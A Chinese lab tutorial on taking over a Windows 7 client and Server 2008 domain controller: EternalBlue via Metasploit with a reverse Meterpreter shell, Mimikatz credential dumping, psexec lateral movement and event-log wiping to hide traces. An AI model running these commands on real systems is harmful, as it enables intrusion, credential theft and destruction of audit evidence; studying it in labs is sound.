2026/4/10 4:19:30
网站建设
项目流程
云营销网站建设电话咨询,做货代在上面网站找客户比较多,网站流量查询网站,织梦做的网站前面有不安全Windows 7 Windows Server 2008 域环境渗透实战完整教程#xff08;详细版・教学专用#xff09;
一、教程核心定位与目标
本教程模拟真实内网渗透场景#xff0c;以 “攻击机打点→拿下客户端→横向移动控域控” 为核心链路#xff0c;完成从 “边界突破” 到 “内网统…Windows 7 Windows Server 2008 域环境渗透实战完整教程详细版・教学专用一、教程核心定位与目标本教程模拟真实内网渗透场景以 “攻击机打点→拿下客户端→横向移动控域控” 为核心链路完成从 “边界突破” 到 “内网统治” 的全流程实战。重点覆盖永恒之蓝漏洞利用、Meterpreter 权限操作、域凭证抓取、横向移动、域控接管及痕迹清理等核心技能适配渗透测试新手入门及教学演示所有操作均附 “命令 目的 结果解读”确保可复现、易理解。二、前期环境搭建教学必讲环境是实战基础2.1 环境架构与核心配置主机角色系统版本固定 IP核心配置要求备注教学重点攻击机Kali Linux≥2023 版192.168.10.1001. 关闭防火墙ufw disable2. 与目标机同网段VMnet1 仅主机模式3. 自带 MSF/Nmap/Crackmapexec网段互通是前提否则攻击失败目标客户端跳板机Windows 7 企业版SP1x64192.168.10.301. 加入 “HACKERPTS” 域域控 IP192.168.10.202. 卸载 MS17-010 补丁3. 关闭防火墙4. 本地账号 Butcher空密码漏洞补丁未卸载则永恒之蓝攻击失败目标域控核心目标Windows Server 2008 R2x64192.168.10.201. 安装 AD 域服务 DNS 服务域名为HACKERPTS.com2. DNS 指向自身3. 域管账号 Administrator密码 Luxiang839939394. 开启 RDPDNS 配置错误会导致 Win7 加域失败2.2 环境连通性校验前置必做避免踩坑Kali 侧 ping 测试执行ping 192.168.10.30和ping 192.168.10.20确保丢包率 0%Win7 侧域连通性CMD 执行nltest /dclist:HACKERPTS能显示域控名称如 WIN-GKL7OK91MGA则加域成功域控侧服务校验CMD管理员执行sc query dnsserver和sc query netlogon确保 DNS/NetLogon 服务为 “RUNNING”。三、核心渗透流程分步详解教学重点阶段 1信息收集 —— 扫描目标端口与漏洞打点前必做目的明确 Win7 开放端口定位攻击面重点关注 SMB 端口 139/445、RDP 端口 3389。Kali 终端执行端口扫描命令跳过 ping 检测避免 Win7 禁 ping 误判bash运行nmap -Pn -p 139,445,3389 192.168.10.30命令参数解读-Pn跳过主机存活检测直接扫描端口-p 139,445,3389指定扫描 SMB 协议核心端口139/445永恒之蓝依赖和 RDP 远程桌面端口3389理想结果攻击条件满足textPORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server异常处理方案教学重点常见坑若 445 端口显示 “filtered”Win7 防火墙未关后续可通过 Meterpreter 执行netsh advfirewall set allprofiles state off关闭若 445 端口显示 “closed”SMB 服务未启动Win7 侧 CMD 执行net start lanmanserver启动。阶段 2漏洞利用 ——MS17-010永恒之蓝拿下 Win7核心原理利用 Win7 未修复的永恒之蓝漏洞CVE-2017-0144远程执行代码并获取 System 权限Windows 最高权限。启动 MSF 攻击框架Kali 终端执行msfconsole等待加载完成出现 “msf ” 提示符加载永恒之蓝攻击模块bash运行use exploit/windows/smb/ms17_010_eternalblue配置攻击参数教学时逐行解释避免死记硬背设置目标 IPWin7set RHOSTS 192.168.10.30设置载荷反弹 Meterpreter Shellset PAYLOAD windows/x64/meterpreter/reverse_tcpx64 对应 Win7 64 位系统设置监听 IPKali 自身 IPset LHOST 192.168.10.100确保目标机能回连 Kali发起攻击执行exploit等待命令执行过程约 10 秒屏幕会滚动攻击日志攻击成功标志教学重点明确结果屏幕出现Meterpreter session 1 opened (192.168.10.100:4444 - 192.168.10.30:52615) at XXXX-XX-XX XX:XX:XX提示符变为meterpreter 此时已完全控制 Win7。阶段 3权限巩固 ——Win7 凭证抓取与 RDP 开启目的抓取 Win7 内的域相关凭证为横向移动到域控做准备开启 RDP 方便图形化操作。验证当前权限教学重点明确权限级别Meterpreter 内执行getuid结果显示Server username: NT AUTHORITY\SYSTEM确认是最高权限加载 KiwiMimikatz 新版凭证抓取神器执行load kiwi出现 “Success” 及 Mimikatz 版本信息则加载成功抓取所有凭证重点关注域相关凭证执行creds_all核心结果解读教学时标注重点textmsv credentials Username Domain NTLM -------- ------ ---- WIN-EHGFCAJG4QV$ HACKERPTS 958f34ff5fb584fea9fd1e2e745a6e60 域机器账户Hash wdigest credentials WIN-EHGFCAJG4QV$ HACKERPTS cV[xVvqU ,-.su7D5a... 域机器账户明文密码注$结尾的账号是域机器账户域控自动生成其凭证可用于域内横向移动补充抓取注册表 Hash避免内存无明文执行hashdump记录本地管理员Administrator/Butcher的 NTLM Hash格式账号ID:LM Hash:NTLM Hash:::开启 Win7 RDP图形化操作必备执行run post/windows/manage/enable_rdp提示 “RDP is already enabled” 则说明已开启同时会自动放行防火墙规则。阶段 4横向移动 —— 利用域控凭证接管 2008 域控核心逻辑Win7 已加入 HACKERPTS 域域管理员HACKERPTS\Administrator拥有域内所有机器的最高权限利用其凭证从 Win7 跳转到域控横向移动核心思想。4.1 方式 1RDP 远程登录域控直观适合教学演示退出 Meterpreter 会话保留后台Meterpreter 内执行background再执行exit -y退出 MSFKali 侧启动 RDP 连接重点讲解账号格式bash运行rdesktop 192.168.10.20 -u HACKERPTS\Administrator -p Luxiang83993939账号格式域名\用户名HACKERPTS\Administrator而非 “机器名 \ 用户名”这是新手最易踩的坑密码带特殊符号需加引号避免终端解析错误登录成功标志弹出 2008 域控桌面可打开 “Active Directory 用户和计算机” 等域管理工具。4.2 方式 2Psexec 远程获取域控 CMD更贴合实战隐蔽性强Win7 侧打开 CMD管理员权限通过 RDP 登录 Win7 后操作执行远程命令直接获取域控 CMDcmdpsexec \\192.168.10.20 -u HACKERPTS\Administrator -p Luxiang83993939 cmd.exe成功标志弹出新的 CMD 窗口标题显示 “\192.168.10.20”执行net user /domain可查看域内所有用户证明已获取域控权限。阶段 5域控权限验证教学重点证明完全控制域登录域控后执行以下命令验证域管理员权限这是 “拿下域控” 的核心证明查看域内所有用户net user /domain查看域管理员组核心权限组net group Domain Admins /domain查看域内所有机器net view /domain:HACKERPTS新增域用户可选教学演示权限net user testuser Test123 /add /domain。四、常见问题与解决方案教学重点避坑指南问题现象核心原因解决方案RDP 登录提示 “账户已停用”Win7 本地 Administrator 禁用改用域账号HACKERPTS\Administrator登录域账号默认不受本地禁用规则限制RDP 登录提示 “账号 / 密码错误”账号格式错误切换到 “其他用户”输入完整格式HACKERPTS\Administrator 正确密码永恒之蓝攻击提示 “Exploit completed, but no session was created”Win7 系统版本 / 补丁不匹配确认 Win7 为 64 位、卸载 MS17-010 相关补丁、更换载荷为 windows/x86/meterpreter/reverse_tcp32 位复制粘贴命令到终端出现乱码特殊符号转义手动输入命令尤其是反斜杠 \、等符号避免复制粘贴五、痕迹清理贴合 “野蛮人” 风格来无影去无踪核心目标删除操作日志、清理连接记录让渗透行为 “无迹可寻”。5.1 Win7 侧痕迹清理RDP 登录后操作清除系统 / 安全 / 应用程序日志cmdwevtutil cl System wevtutil cl Security wevtutil cl Application清理 RDP 连接记录cmdreg delete HKCU\Software\Microsoft\Terminal Server Client\Default /f关闭 Meterpreter 会话Kali 侧bash运行msfconsole -q -x sessions -K5.2 域控侧痕迹清理登录域控后操作清除域控特有日志AD/DNScmdwevtutil cl Directory Service wevtutil cl DNS Server wevtutil cl System wevtutil cl Security清理远程连接 IP 记录cmdreg delete HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v LastClientIP /f六、教学核心总结复习重点内网渗透核心链路打点拿下边界机 Win7→ 凭证抓取 → 横向移动控域控→ 权限维持 / 痕迹清理域环境关键规则域管理员账号可访问域内所有机器这是横向移动的核心依据新手避坑重点RDP 账号格式域名 \ 用户名、命令特殊符号处理、日志清理的必要性实战核心思想权限是渗透的核心System 权限Win7→ 域管理员权限域控是内网渗透的终极目标。